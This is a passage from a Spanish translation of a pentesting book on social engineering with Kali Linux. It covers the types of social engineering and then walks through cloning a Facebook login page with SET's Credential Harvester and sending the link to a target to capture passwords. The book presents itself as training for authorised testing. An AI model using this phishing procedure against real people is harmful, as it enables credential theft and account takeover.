Está en la página 1de 84

Ingeniería social Kali Linux

Realice de manera eficaz pruebas de ingeniería social y


pruebas de penetración organizadas y eficientes utilizando
Kali Linux

Rahul Singh Patel

BIRMINGHAM - MUMBAI
Ingeniería social Kali Linux

Copyright © 2013 Packt Publishing

Reservados todos los derechos. Ninguna parte de este libro puede ser reproducida, almacenada en
un sistema de recuperación o transmitida de cualquier forma o por cualquier medio, sin el permiso
previo por escrito del editor, excepto en el caso de breves citas incluidas en artículos críticos o
reseñas.

Se ha hecho todo lo posible en la preparación de este libro para asegurar la exactitud de


la información presentada. Sin embargo, la información contenida en este libro se vende
sin garantía, ya sea expresa o implícita. Ni el autor, ni Packt Publishing, ni sus
distribuidores y distribuidores serán responsables de los daños causados o
supuestamente causados directa o indirectamente por este libro.

Packt Publishing se ha esforzado por proporcionar información de marcas comerciales sobre todas las
empresas y productos mencionados en este libro mediante el uso apropiado de mayúsculas. Sin
embargo, Packt Publishing no puede garantizar la exactitud de esta información.

Primera publicación: diciembre de 2013

Referencia de producción: 1171213

Publicado por Packt Publishing Ltd.


Livery Place
Calle Librea 35
Birmingham B3 2PB, Reino Unido.

ISBN 978-1-78328-327-9

www.packtpub.com

Imagen de portada de Aniket Sawant (aniket_sawant_photography@hotmail.com )


Créditos

Autor Coordinador del proyecto

Rahul Singh Patel Michelle Quadros

Revisores Correctores de pruebas

Pranshu Bajpai María Gould

Aamir Lakhani Paul Hindle

José Muniz
Indexador
Rohit Patel
Monica Ajmera Mehta

Editor de adquisiciones

Joanne Fitzpatrick Coordinador de produccion


Conidon Miranda

Editores de puesta en servicio

Manasi Pandire Trabajo de portada

Conidon Miranda
Shaon Basu
Llewellyn Rozario

Editores técnicos
Sharvari H. Baet
Dennis John

Editores de copia

Roshni Banerjee
Brandt D'Mello
Sobre el Autor

Rahul Singh Patel actualmente trabaja como consultor de seguridad independiente en


India. Entre sus muchas otras responsabilidades, realiza evaluaciones de seguridad de
aplicaciones web y pruebas de penetración.

Rahul comenzó su viaje en el mundo de la piratería informática cuando aún estaba en la escuela.
Es un apasionado del tema de las pruebas de penetración y la investigación de seguridad en la
seguridad basada en chips. A lo largo de los años, ha continuado sus intentos de mantenerse
actualizado con los últimos avances tecnológicos en seguridad de TI.

Me gustaría agradecer a mis padres, Shri Mahendra Singh Patel y Smt.


Urmila, por siempre apoyarme. Eres la fuente de energía de mi vida y mi
verdadera fuente de inspiración. También me gustaría agradecer a mi
esposa, Komal, por tener siempre fe en mí y por su apoyo a lo largo de
este proyecto. Y me gustaría dar la bienvenida a Gaurish, el miembro más
nuevo de mi familia.

hare Krishna
Acerca de los revisores

Pranshu Bajpai (MBA, MS) es un profesional de seguridad informática que se especializa en pruebas
de penetración de sistemas, redes y web. Está en proceso de completar su Maestría en Seguridad de la
Información en el Instituto Indio de Tecnología de la Información. Actualmente, también está trabajando
como tester de penetración independiente en un contraataque.
proyecto con una empresa de seguridad en Delhi, India, donde sus responsabilidades incluyen
investigación de vulnerabilidades, implementación de kits de explotación, mantenimiento de
acceso e informes. Es un orador activo apasionado por la seguridad de la información. Como
autor, escribe para PenTest, Hackin9 y ClubHack Magazine (entre otros). En su tiempo libre, le
gusta escuchar rock clásico mientras escribe en un blog enwww.lifeofpentester.blogspot.
com.

Me gustaría agradecer a la comunidad de piratería para Linux, las


aplicaciones de código abierto y la educación gratuita en línea, que me
enseñó más de lo que nunca aprendí en las aulas.

Sobre todo, me gustaría agradecer a mi madre, la Dra. Rashmi


Vajpayee, por estar siempre ahí e inspirarme a no dar marcha atrás.
Aamir Lakhani es un arquitecto líder en ciberseguridad y contrainteligencia cibernética. Es responsable de
proporcionar soluciones de seguridad de TI a las principales organizaciones empresariales federales y
comerciales. Lidera proyectos que implementan posturas de seguridad para compañías Fortune 500, el
Departamento de Defensa de EE. UU., Los principales proveedores de atención médica,
instituciones educativas y organizaciones financieras y de grandes medios de comunicación. Él tiene
diseñó medidas de contradefensa ofensivas para las agencias de defensa e inteligencia y ha ayudado a
las organizaciones a defenderse de los ataques de contraataque activos perpetrados por grupos
cibernéticos clandestinos. Aamir es considerado un líder de la industria en el apoyo de proyectos y
compromisos arquitectónicos detallados sobre temas relacionados con la defensa cibernética, las
amenazas de aplicaciones móviles, el malware, la investigación de amenazas persistentes avanzadas
(APT) y la seguridad oscura. Además, tiene una amplia experiencia en centros de datos de alto
rendimiento, protocolos de enrutamiento complejos, computación en la nube y virtualización.

Aamir ha sido autor o colaborador de varios libros, incluidos Pruebas de penetración


web con Kali Linux y MDM instantáneo de XenMobile de Packt Publishing. Ha
aparecido en las revistas Pen Test y Hacking Magazine en numerosas ocasiones.
También ha aparecido en Federal News Radio como experto en seguridad cibernética
y es un orador frecuente en conferencias de seguridad en todo el mundo, incluidas
RSA, Hacker Halted y TakeDownCon.

Aamir escribe y también opera uno de los blogs de seguridad líderes en el mundo en
http://www.DrChaos.com. En su lista reciente de 46 expertos federales en tecnología para seguir en
Twitter, La revista FedTech lo describió como "un bloguero, especialista en seguridad de información,
superhéroe y todo un buen tipo".

Me gustaría agradecer a mis padres, Mahmood y Nasreen Lakhani, por


sacar lo mejor de mí y por animarme diciéndome que la única forma de
triunfar en la vida es no tener miedo de estar fuera de mi zona de confort.
Me gustaría agradecer a mis hermanas, Noureen y Zahra Lakhani, por
comprenderme y por empujarme a no conformarme con ser justo.
bueno, pero para ser genial. Mis sobrinas Farida y Sofia, espero que lo hagan
perdóname por no jugar Wii cuando estaba revisando este libro. Por último, me
gustaría agradecer a todos mis amigos y colegas, especialmente a Tim Adams,
Ladi Adefala, Kathi Bomar, Brian Ortbals, Bart Robinson y Matt Skipton, y a una
docena de personas más por darme la oportunidad de trabajar en los temas
más complicados del mundo. proyectos y arquitectos y diseños de las
soluciones más complejas del mundo. Gracias David L. Steward, presidente de
la junta directiva de WorldWide Technology, y
JimKavanaugh, director ejecutivo de WorldWide Technology,
y al resto del equipo ejecutivo por convertirlo (según la revista Forbes y
varios años seguidos) en uno de los mejores lugares para trabajar. Ha
sido un privilegio y un honor llamar a WWT mi hogar.
José Muniz es CSE en Cisco Systems y también investigador de seguridad. Inició su
carrera en el desarrollo de software y luego administró redes como recurso técnico
contratado. Joseph pasó a la consultoría y descubrió su pasión por la seguridad mientras se
reunía con una variedad de clientes. Ha estado involucrado en el diseño e implementación
de múltiples proyectos que van desde corporaciones Fortune 500 hasta grandes redes
federales.

José corre TheSecurityBlogger.com, un recurso popular para la seguridad y el producto


implementación. También puede encontrarlo hablando en eventos en vivo, así como también involucrado.
con otras publicaciones. Recientemente fue orador deEngaño en las redes sociales en la
Conferencia Internacional de ASIS de 2013 y orador de la Elimine los puntos ciegos de la red con
la seguridad del centro de datos seminario web. El es el autor dePruebas de penetración web con
Kali Linux, Packt Publishing, y también ha escrito un artículo: Compromiso de contraseñas, Revista
PenTest - Compendio Backtrack, Hakin9 Media Sp. z oo SK,Julio 2013.

Fuera del trabajo, se puede encontrar a Joseph detrás de tocadiscos rascando vinilos clásicos o en
el campo de fútbol pirateando a los equipos de clubes locales.

Mi contribución a este libro no podría haberse realizado sin el apoyo


de mi encantadora esposa, Ning, y las inspiraciones creativas de mi
hija, Raylin. También debo acreditar mi pasión por aprender a mi
hermano, Alex, quien me crió junto con mis amados padres, Irene y
Ray. También me gustaría dar las gracias a todos mis amigos,
familiares y colegas que me han apoyado a lo largo de los años.
Rohit Patel es de Jabalpur, MP, India. En 2011, recibió su licenciatura en Tecnología de la
Información de GRKIST Engineering College. Es un aficionado a la tecnología que está interesado
en aprender cosas nuevas que aprovechen sus habilidades y el poder de su conocimiento.
Actualmente, trabaja con Directi, Bangalore, como ingeniero senior de alojamiento web.

Rohit está interesado en varias cosas, algunas de las cuales son la creación de redes; Linux;
lenguajes de programación, como HTML, Shell Scripting y Perl; Distribuciones de Linux, como
BackTrack (sistema operativo de prueba de penetración), Kali Linux (penetración avanzada
SO de prueba) y WifiWay (SO de prueba de penetración inalámbrica); Sistemas operativos Linux, como
Redhat, CentOS, Fedora, Ubuntu, Debian; Windows, como Windows Server 2003, Windows
Server 2008 y Windows Server 2012; y sistemas operativos de cliente Windows, como
como Windows XP 2, XP 3, Vista, 7 y 8. Ha recibido capacitación para obtener certificaciones
como CCNA (dos veces), RHCE Linux, MCSE 2003 y MCITP 2008 Server.

Es un bloguero por interés y un probador de penetración por elección. Sus sitios web incluyen
http://www.rohitpatel.in/, http://www.rohitpatel.biz/, http: // www. rohitpatelgrkist.in/, http://
www.rohitpatelgrkist.co.nr/, http: // www. rohitpatel.net/,y http://www.rohitpatel.co.nr/.
www.PacktPub.com

Archivos de soporte, libros electrónicos, ofertas de descuento,

y más
Es posible que desee visitar www.PacktPub.com para obtener archivos de soporte y descargas relacionadas
a tu libro.

¿Sabía que Packt ofrece versiones de libros electrónicos de todos los libros publicados, con PDF?
y archivos ePub disponibles? Puede actualizar a la versión de libro electrónico en www.PacktPub.
com y como cliente de un libro impreso, tiene derecho a un descuento en la copia del libro electrónico.
Ponte en contacto con nosotros enservice@packtpub.com para más detalles.

En www.PacktPub.com, también puede leer una colección de artículos técnicos gratuitos, suscribirse a
una variedad de boletines informativos gratuitos y recibir descuentos y ofertas exclusivos en libros y
libros electrónicos Packt.
TM

http://PacktLib.PacktPub.com

¿Necesita soluciones instantáneas a sus preguntas de TI? PacktLib es Packt's online


biblioteca de libros digitales. Aquí, puede acceder, leer y buscar en toda la biblioteca de
libros de Packt.

¿Por qué suscribirse?


• Totalmente disponible para búsquedas en todos los libros publicados

• por Packt Copiar y pegar, imprimir y marcar contenido a pedido y

• accesible a través de navegadores web

Acceso gratuito para titulares de cuentas Packt


Si tiene una cuenta con Packt en www.PacktPub.com, puede usar esto para acceder a PacktLib hoy y ver nueve
libros completamente gratuitos. Simplemente use sus credenciales de inicio de sesión para obtener acceso
inmediato.
Tabla de contenido
Prefacio 1
Capítulo 1: Introducción a los ataques de ingeniería social 5
Comprender los ataques de ingeniería social 6
Fases de un ataque de ingeniería social 6
Investigar 7
Gancho 7
Tocar 7
Salida 7
Tipos de ingeniería social 7
Ingeniería social basada en humanos 7
Ingeniería social basada en computadora 9
Herramientas de ingeniería social basadas en computadora - Kit de herramientas de
ingeniería social (SET) 10
Clonación de sitios web 12
Políticas y procedimiento dieciséis

Capacitación 17
Sistema de respuesta a incidentes 17
Clasificación de información 17
Políticas de contraseñas 17
Resumen 18
Capítulo 2: Comprensión de los vectores de ataque a sitios web 19
Phishing y piratería de correo electrónico: ataque Credential Harvester 20
Actualización de su web jack de Social- 20
Engineering Toolkit 20
Vector de ataque de spear-phishing 24
Ataque de applet de Java 31
Defensa contra estos ataques 36
Resumen 36
Tabla de contenido

Capítulo 3: Realización de ataques del lado del cliente a través de SET 37


Creando una carga útil y un oyente 37
Vulnerabilidad 37
Explotar 38
Carga útil 38
Pasos para crear una carga útil y un oyente 38
Comprender el ataque de correo masivo 42
Comprender el vector de ataque de suplantación de identidad de SMS 45
La plantilla predefinida 49
Resumen 50
Capítulo 4: Comprensión de los ataques de ingeniería social 51
El robo de identidad 52
Robar una identidad 52
Sonsacamiento 53
Habilidades requeridas en un atacante 53
Herramientas de prueba de penetración 54
El marco de explotación del navegador 54
El marco de la ingeniería social 59
Sefemails 60
Sefphish 62
Sefnames 62
SefPayload 63
Defensa 63
Resumen 64
Índice sesenta y cinco

[ii]
Prefacio
Este libro contiene instrucciones sobre cómo llevar a cabo ataques con Kali Linux. Es probable que
estas tareas sean ilegales en su jurisdicción en muchas circunstancias, o al menos cuenten como
una infracción de los términos de servicio o mala conducta profesional. Las instrucciones se
proporcionan para que pueda probar su sistema contra amenazas, comprender la naturaleza de
esas amenazas y proteger sus propios sistemas de ataques similares.

El entorno de seguridad de la información ha cambiado enormemente a lo largo de los años. Ahora, a pesar de
tener políticas de seguridad, cumplimiento y elementos de seguridad de infraestructura como
firewalls, IDS / IPS, proxies y honey pots implementados dentro de cada organización,
Escuche noticias sobre cómo los piratas informáticos comprometen las instalaciones seguras del gobierno o
de organizaciones privadas debido al elemento humano involucrado en cada actividad.

Por lo general, los empleados no conocen los trucos y técnicas que utilizan los ingenieros sociales en
los que pueden ser utilizados como mediadores para obtener información valiosa, como detalles de
tarjetas de crédito o secretos corporativos. La seguridad de toda la organización puede estar en juego
si un empleado visita un sitio web malicioso, responde un ingeniero social
llamada telefónica o hace clic en el enlace malicioso que recibió en su
o ID de correo electrónico de la empresa. Este libro analiza los diferentes ataques de ingeniería social
basados en escenarios, tanto manuales como computarizados, que pueden hacer que la seguridad
de la organización sea ineficaz.

Este libro está dirigido a profesionales de la seguridad que desean garantizar la seguridad de su
organización contra ataques de ingeniería social.

TrustedSec ha creado la maravillosa herramienta Social-Engineering Toolkit (SET) con la visión de


ayudar a los auditores de seguridad a realizar pruebas de penetración contra ataques de
ingeniería social. Este libro arroja luz sobre cómo los atacantes acceden a las redes más seguras
con solo enviar un correo electrónico o realizar una llamada.
Prefacio

Los ataques sofisticados, como los ataques de spear-phishing y los ataques web jacking, se
explican en un formato gráfico por pasos. Muchos más ataques están cubiertos con un enfoque
más práctico para facilitar la lectura para los principiantes.

Que cubre este libro


Capítulo 1, Introducción a los ataques de ingeniería social, introduce el concepto de
ataques de ingeniería social, tanto manuales como computarizados, y las diferentes fases
involucradas. Aprenderá cómo realizar un ataque de recolector de credenciales y qué
contramedidas deben tomarse para que los empleados estén al tanto de tales ataques y
que el ingeniero social no los engañe.

Capítulo 2, Comprensión de los vectores de ataque a sitios web, analiza cómo un ingeniero social puede
ingresar a un sistema informático o servidor de red atacando elementos de la capa de aplicación
(navegadores web y correo electrónico) para comprometer el sistema y cómo formular nuevas políticas
para proteger a los empleados de este tipo de ataques.

Capítulo 3, Realización de ataques del lado del cliente a través de SET, lo guía para realizar ataques del
lado del cliente a través de SET y explica cómo crear escuchas y cargas útiles. También arroja luz sobre
los diferentes tipos de cargas útiles, sobre eludir las firmas AV y sobre algunas otras características
avanzadas del kit de herramientas SET. Aprenderá cómo se realiza un ataque de correo masivo y
cómo se pueden enviar SMS falsificados.

Capítulo 4, Comprensión de los ataques de ingeniería social, lo guía a través de los métodos
para realizar ataques de ingeniería social tanto técnicos como no técnicos, como realizar el
robo de identidad, elicitación y atacar un navegador web y una aplicación en una máquina
remota.

Que necesitas para este libro


Para practicar el material, necesitará herramientas de virtualización como VMware o
VirtualBox con el sistema operativo Kali Linux, junto con una conexión a Internet.

para quien es este libro


Este libro está dirigido a cualquier persona ética que tenga el impulso, la convicción y la voluntad de
pensar de manera innovadora y aprender sobre las pruebas de seguridad. Este libro está
recomendado para cualquier persona que reciba y envíe correos electrónicos que trabajen en
cualquier puesto en una organización. Si es un tester de penetración, un consultor de seguridad o
simplemente tiene interés en probar la seguridad de su entorno contra ataques de ingeniería social,
este libro es para usted.

[2]
Prefacio

Convenciones
En este libro, encontrará varios estilos de texto que distinguen entre
diferentes tipos de información. A continuación, se muestran algunos ejemplos de estos estilos y una
explicación de su significado.

Las palabras de código en el texto se muestran de la siguiente manera: "Simplemente puede


invocarlo a través de la línea de comando utilizando se-toolkit ".

Cualquier entrada o salida de la línea de comandos se escribe de la siguiente manera:

/ usr / share / set # ./set


root @ Kali : / usr / share / set / # conjunto de python

Nuevos términos y Palabras importantes se muestran en negrita. Las palabras que ve en la pantalla,
en menús o cuadros de diálogo, por ejemplo, aparecen en el texto de esta manera: "Usaremos un
ataque de Credentials Harvester que viene bajoVectores de ataque a sitios web ".

Las advertencias o notas importantes aparecen en un cuadro como este.

Los consejos y trucos aparecen así.

Comentarios de los lectores


Los comentarios de nuestros lectores es siempre bienvenido. Háganos saber lo que piensa de este
libro, lo que le gustó o no le gustó. Los comentarios de los lectores son importantes para que
podamos desarrollar títulos que realmente aproveches al máximo.

Para enviarnos comentarios generales, simplemente envíe un correo electrónico a feedback@packtpub.com ,


y mencione el título del libro a través del asunto de su mensaje.

Si hay un tema en el que tiene experiencia y está interesado en escribir o contribuir a


un libro, consulte nuestra guía para autores en www.packtpub.com/authors.

Atención al cliente
Ahora que es el orgulloso propietario de un libro Packt, tenemos una serie de cosas para
ayudarlo a aprovechar al máximo su compra.

[3]
Prefacio

Errata
Aunque nos hemos esforzado al máximo para garantizar la precisión de nuestro contenido, los errores
suceda. Si encuentra un error en uno de nuestros libros, tal vez un error en el texto
o el código; le agradeceríamos que nos informara de esto. Al hacerlo, puede
salvar a otros lectores de la frustración y ayudarnos a mejorar
versiones de este libro. Si encuentra alguna errata, infórmela visitandohttp: //
www.packtpub.com/submit-errata, seleccionando su libro, haciendo clic en el formulario de
envío de erratas enlace e ingresando los detalles de su errata. Una vez que tu errata
se verifican, su envío será aceptado y la errata se cargará en
nuestro sitio web, o agregado a cualquier lista de erratas existentes, en la sección Erratas de
ese título. Cualquier errata existente se puede ver seleccionando su título dehttp: // www.
packtpub.com/support.

Piratería
La piratería de material protegido por derechos de autor en Internet es un problema constante en
todos los medios. En Packt, nos tomamos muy en serio la protección de nuestros derechos de autor y
licencias. Si encuentra copias ilegales de nuestras obras, en cualquier forma, en Internet, indíquenos la
dirección de la ubicación o el nombre del sitio web de inmediato para que podamos buscar una
solución.

Por favor contáctenos en copyright@packtpub.com con un enlace al material


presuntamente pirateado.

Agradecemos su ayuda para proteger a nuestros autores y nuestra capacidad para


brindarle contenido valioso.

Preguntas
Puedes contactarnos en preguntas@packtpub.com si tiene algún problema con
algún aspecto del libro, haremos todo lo posible para solucionarlo.

[4]
Introducción a las redes sociales

Ataques de ingeniería
Este capítulo le muestra cómo hacer algunas cosas que en muchas situaciones pueden ser
ilegales, poco éticas, una violación de los términos de servicio o simplemente no ser una
buena idea. Se proporciona aquí para brindarle información que puede utilizar para
protegerse contra amenazas y hacer que su propio sistema sea más seguro. Antes de seguir
estas instrucciones, asegúrese de estar en el lado correcto de la línea legal y ética ... ¡use sus
poderes para siempre!

Este capítulo proporciona una introducción a los ataques de ingeniería social y los
conceptos básicos detrás de ellos. Se le presentarán los siguientes temas:

• Comprender los ataques de ingeniería social


• Fases de un ataque de ingeniería social
• Tipos de ataques de ingeniería social
• Clonar un sitio web para obtener la contraseña del objetivo

• Políticas y procedimiento
• Contramedidas a los ataques de ingeniería social
Introducción a los ataques de ingeniería social

Comprender los ataques de


ingeniería social
Ingeniería social proviene de dos palabras, social e ingeniería, donde social se refiere a
nuestra vida cotidiana, que incluye tanto la vida personal como la profesional, mientras
que Ingenieria significa un forma definida de realizar una tarea siguiendo
ciertos pasos para lograr el objetivo.

La ingeniería social es un término que describe una intrusión no técnica que depende en gran medida
de la interacción humana y, a menudo, implica engañar a otras personas para que rompan los
procedimientos de seguridad normales. Para ver un ejemplo, consultehttp://www.wired.com/
nivel de amenaza / 2011/04 / oak-ridge-lab-. Aquí puede ver cómo una de las principales
lab fue pirateado por el uso del ataque de spear phishing.

El Laboratorio Nacional de Oak Ridge se vio obligado a interrumpir la conexión a Internet


de sus trabajadores después de que la instalación federal fuera pirateada. Según Thomas
Zacharia, subdirector del laboratorio, este ataque fue sofisticado y lo comparó con el
Amenaza persistente avanzada que afectó a la empresa de seguridad RSA y Google el año pasado.

El atacante usó Internet Explorer para realizar una vulnerabilidad de día cero para violar la red del
laboratorio. Microsoft posteriormente corrigió esta vulnerabilidad en abril de 2012. La
vulnerabilidad, descrita como una vulnerabilidad crítica de ejecución remota de código, permite a
un atacante instalar malware en la máquina de un usuario si visita un sitio web malicioso. A
vulnerabilidad de día cero es un tipo de vulnerabilidad presente en una aplicación para la que el
parche no se ha lanzado o no está disponible.

Según Zacharia, los empleados del departamento de recursos humanos recibieron un correo electrónico que
discutió los beneficios para empleados e incluyó un enlace a un sitio web malicioso. Este correo
se envió a 530 empleados, de los cuales 57 personas hicieron clic en el enlace y solo dos
las máquinas se infectaron con el malware. Entonces, como podemos ver, no es muy difícil obtener
dentro de una red segura. Muchos de estos ataques se tratan en los siguientes capítulos.

Fases de un ataque de ingeniería social


Un ataque de ingeniería social es un proceso continuo que comienza con la investigación
inicial, que es la fase inicial, hasta su finalización, cuando el ingeniero social termina la
conversación. La conversación es una breve cobertura de las cuatro fases que sigue el
ingeniero social para realizar un ataque.

[6]
Capítulo 1

Investigar
En la fase de investigación, el atacante intenta recopilar información sobre la empresa objetivo.
La información sobre el objetivo se puede recopilar de varios recursos y medios, como el buceo
en contenedores, el sitio web de la empresa, documentos públicos, interacciones físicas, etc. La
investigación es necesaria cuando se dirige a un solo usuario.

Gancho
En esta fase, el atacante hace el movimiento inicial al intentar iniciar una conversación con el
objetivo seleccionado después de completar la fase de investigación.

Tocar
El propósito principal de este paso es fortalecer la relación y continuar el diálogo
para explotar la relación y obtener la información deseada para la cual se inició la
comunicación.

Salida
Esta es la última fase del ataque de ingeniería social, en la que el ingeniero social
sale de la escena del ataque o detiene la comunicación con el objetivo sin crear una
escena ni hacer nada que haga sospechar al objetivo.

Tipos de ingeniería social


En la sección anterior aprendimos qué es la ingeniería social y el proceso que utiliza un
ingeniero social para realizar un ataque de ingeniería social.

En esta sección discutiremos las formas en que podemos realizar un ataque de ingeniería
social. Básicamente, la ingeniería social se divide en dos tipos: basada en humanos y basada
en computadora.

Ingeniería social basada en humanos


En los ataques de ingeniería social basados en humanos, el ingeniero social interactúa directamente
con el objetivo para obtener información.

[7]
Introducción a los ataques de ingeniería social

Un ejemplo de este tipo de ataque sería cuando el atacante llama al administrador de la base de
datos y le pide que restablezca la contraseña de la cuenta de destino desde una ubicación remota
mediante la recopilación de la información del usuario de cualquier sitio de red social remoto de la
empresa XYZ.

La ingeniería social basada en humanos se puede clasificar de la siguiente manera:

• A cuestas: En este tipo de ataque, el atacante se aprovecha engañando al personal autorizado


para que ingrese a un área restringida de la empresa objetivo, como la sala de servidores. Por
ejemplo, el atacante X ingresa a la empresa ABC como candidato para una entrevista, pero
luego ingresa a un área restringida engañando a una persona autorizada, alegando que es un
empleado nuevo de la empresa y, por lo tanto, no tiene una identificación de empleado, y
utilizando el objetivos de la tarjeta de identificación.

• Suplantar: En este tipo de ataque, un ingeniero social finge ser un empleado válido de la
organización y obtiene acceso físico. Esto se puede realizar perfectamente en el mundo
real usando un traje o una identificación duplicada de la empresa. Una vez dentro de las
instalaciones, el ingeniero social puede obtener información valiosa desde una
computadora de escritorio.
• Escuchas a escondidas: Se trata de la escucha no autorizada de la comunicación entre
dos personas o la lectura de mensajes privados. Se puede realizar utilizando canales de
comunicación como líneas telefónicas y correos electrónicos.
• Ingeniería social inversa: Esto es cuando el atacante crea una persona que
parece estar en una posición de autoridad. En tal situación, el objetivo pedirá la
información que desee. Los ataques de ingeniería inversa generalmente
ocurren en áreas de marketing y soporte técnico.
• Buceo en contenedor: El buceo en un contenedor de basura implica buscar en el bote de basura
información escrita en trozos de papel o impresiones de computadora. El pirata informático
a menudo puede encontrar contraseñas, nombres de archivos u otros datos confidenciales
información en botes de basura.

• Haciéndose pasar por un usuario final legítimo: En este tipo de ataque, el ingeniero
social asume la identidad de un usuario legítimo e intenta obtener la información, por
ejemplo, llamando al servicio de asistencia y diciendo: "Hola, soy Mary de la X
Departamento. No recuerdo la contraseña de mi cuenta; ¿Me pueden ayudar?"

[8]
Capítulo 1

Ingeniería social basada en computadora


La ingeniería social basada en computadora se refiere a los ataques llevados a cabo con la ayuda
de software para obtener la información deseada. Algunos de estos tipos de ataques se enumeran
a continuación:

• Ventanas emergentes: Las ventanas emergentes engañan a los usuarios para que hagan clic
en un hipervínculo que los redirige a visitar la página web de un atacante, pidiéndoles que
revelen su información personal o pidiéndoles que descarguen software que podría haber
adjuntado virus en el backend.

Un ejemplo de ventana emergente

• Ataque interno: Este tipo de ataque se realiza desde dentro de la red objetivo.
La mayoría de los ataques internos están orquestados por empleados
descontentos que no están contentos con su puesto en la organización o porque
tienen rencores personales contra otro empleado o la dirección.

[9]
Introducción a los ataques de ingeniería social

• Suplantación de identidad: Los spammers a menudo envían correos electrónicos de forma masiva a
cuentas de correo electrónico, por ejemplo, aquellos que afirman ser del departamento de lotería del Reino
Unido y le informan que ha ganado un millón de libras. Le solicitan que haga clic en un enlace en el correo
electrónico para proporcionar los detalles de su tarjeta de crédito o ingresar información como
su nombre, dirección, edad y ciudad. Usando este método elEl ingeniero social puede
recopilar números de seguridad social e información de la red.
• La estafa "Nigerian 419": En la estafa nigeriana, el atacante le pide al objetivo que
realice pagos por adelantado o transferencias de dinero. Se llama 419 porque "4-1-9" es
una sección del Código Penal de Nigeria que prohíbe esta práctica. El atacante o los
estafadores suelen enviar al objetivo correos electrónicos o cartas con algunas ofertas
lucrativas que indican que su dinero ha sido atrapado en algún país que actualmente está
en guerra, por lo que necesitan ayuda para sacar el dinero y que le darán al objetivo un
compartir, que en realidad nunca llega. Estos estafadores le piden que pague dinero o les
proporcione los datos de su cuenta bancaria para ayudarlos a transferir el dinero. Luego
se le solicita que pague tarifas, cargos o impuestos para ayudar a liberar o transferir el
dinero fuera del país a través de su banco. Estas "tarifas" pueden comenzar como
pequeñas cantidades. Si se paga, al estafador se le ocurren nuevas tarifas que requieren
el pago antes de que pueda recibir su "recompensa". Seguirán inventando estas excusas
hasta que crean que han sacado todo el dinero que pueden de ti. Nunca se le enviará el
dinero prometido.

• Ataque de ingeniería social a través de un SMS falso: En este tipo de


ataque, el ingeniero social enviará un SMS al objetivo alegando ser del
departamento de seguridad de su banco y también alegando que es urgente.
que el objetivo llame al número especificado. Si el objetivo no es demasiado técnico
sonido, llamarán al número especificado y el atacante puede obtener el
información deseada.

Herramientas de ingeniería social basadas en computadora


- Kit de herramientas de ingeniería social (SET)
La Kit de herramientas de ingeniería social (SET) es un producto de TrustedSec. SET es una
suite de herramientas personalizadas impulsada por Python creada por David Kennedy (ReL1K) y
el equipo de desarrollo de SET, compuesto por JR DePre (pr1me), Joey Furr (j0fer),
y Thomas Werth. Para consultar la visitahttp://trustedsec.com/.

[10]
Capítulo 1

SET es un sistema de ataque basado en menús que se concentra principalmente en atacar el elemento humano de la
seguridad. Con una amplia variedad de ataques disponibles, este kit de herramientas es absolutamente imprescindible
para las pruebas de penetración.

SET viene preinstalado en Kali Linux. Simplemente puede invocarlo a través de la línea de
comando usando el comandose-toolkit:

/ usr / share / set # ./set


root @ Kali : / usr / share / set / # conjunto de python

O puede elegirlo a través del Aplicaciones menú:

Abrir SET desde el menú Aplicaciones

[11]
Introducción a los ataques de ingeniería social

Una vez que el usuario haga clic en el kit de herramientas SET, se abrirá con las opciones que se muestran en la
siguiente captura de pantalla:

Menú principal en SET

Antes de poder utilizar el software, debe leer y aceptar la licencia BSD y también
comprometerse a no utilizar esta herramienta para ninguna práctica ilegal. Este
acuerdo también cubre cualquier uso futuro, y no se le volverá a preguntar
después de aceptar presionandoY (sí) cuando se le indique.

Clonación de sitios web


En este ataque, duplicaremos una página web y enviaremos ese enlace de la página duplicada a la
objetivo. Como este es el primer ataque que tiene lugar,Le sugiero que revise las opciones
disponibles en las diferentes secciones del kit de herramientas SET.

[12]
Capítulo 1

La siguiente captura de pantalla muestra el menú del kit de herramientas SET:

La lista de ataques disponibles en SET

Seleccione 1) Ataques de ingeniería social para recibir una lista de posibles ataques que
se pueden realizar.

Puede seleccionar los ataques que desea realizar desde un menú que aparece
como sigue:

Opción Ataque

1 Vectores de ataque de spear-phishing

2 Vectores de ataque de sitio web

3 Generador de medios infecciosos

4 Cree un ataque de envío masivo de

5 carga útil y escucha

6 Vector de ataque basado en Arduino Vector de

7 ataque de falsificación de SMS Vector de ataque

8 de punto de acceso inalámbrico Módulos de

9 terceros

99 Regresar al menú principal

[13]
Introducción a los ataques de ingeniería social

Comenzaremos con los vectores de sitios web. Ingresar2 para pasar al siguiente menú. Para
este ejemplo, en la lista, veremos la tercera opción,Método de ataque del recolector de
credenciales. La siguiente es la lista de vectores disponibles:

1. Método de ataque de applet de Java

2. Método de explotación del navegador Metasploit

3. Método de ataque del recolector de credenciales

4. Método de ataque de tabnabbing


5. Método de ataque de secuestro web

6. Método web de ataques múltiples

7. Cree o importe un certificado de firma de código


99. Volver al menú principal

El siguiente menú ofrece tres opciones. Usaremos una de las plantillas


proporcionadas para este ejemplo:

[TRUNCADO…]
1) Plantillas web
2) Clonador de sitios

3) Importación personalizada

99) Regresar al conjunto de menús de

Webattack: webattack> 2

El segundo método clonará completamente un sitio web de su elección y le permitirá


utilizar los vectores de ataque dentro de la misma aplicación web que estaba
intentando clonar.

La dirección IP que el usuario debe ingresar es la dirección IP de Kali Linux, que se puede
encontrar usando el siguiente comando:

ifconfig –a

Por ejemplo, la dirección IP de mi máquina aparece como 192.168.30.145. Ingrese la URL


para clonar, por ejemplo, http://www.facebook.com, como se muestra en la siguiente
captura de pantalla:

[14]
Capítulo 1

Ahora hemos creado una página de inicio de sesión de Facebook clonada que está escuchando en el puerto 80.
Podemos comprobar el código fuente del clon del sitio web que hemos creado para el phishing.
ataque. Se almacena en /usr / share / set / src / program_junk / Web Clone / ~ Index.html.
La siguiente captura de pantalla muestra el contenido del index.html expediente:

[ 15 ]
Introducción a los ataques de ingeniería social

Esta es la fuente de la página web que el atacante ha clonado a través del kit de herramientas
SET. Navega al127.0.0.1:80 (puerto localhost 80) URL en el navegador. La página de phishing está
alojada en la dirección IP de su máquina.

La siguiente dirección IP debe enviarse al destino; esto se puede enviar a través de un correo electrónico o
se puede cargar en cualquier sitio de alojamiento web:

El resultado final de Credentials Harvester Attack

Una vez que el usuario visita el enlace e ingresa el nombre de usuario y la contraseña, las credenciales de
inicio de sesión se redirigen a nuestro servidor Kali Linux que hemos configurado como se muestra en la
captura de pantalla anterior.

Políticas y procedimiento
Las políticas de seguridad son la base de la infraestructura de seguridad de cualquier organización. A
politica de seguridad es un documento que describe los controles de seguridad que se aplicarán en la
organización.

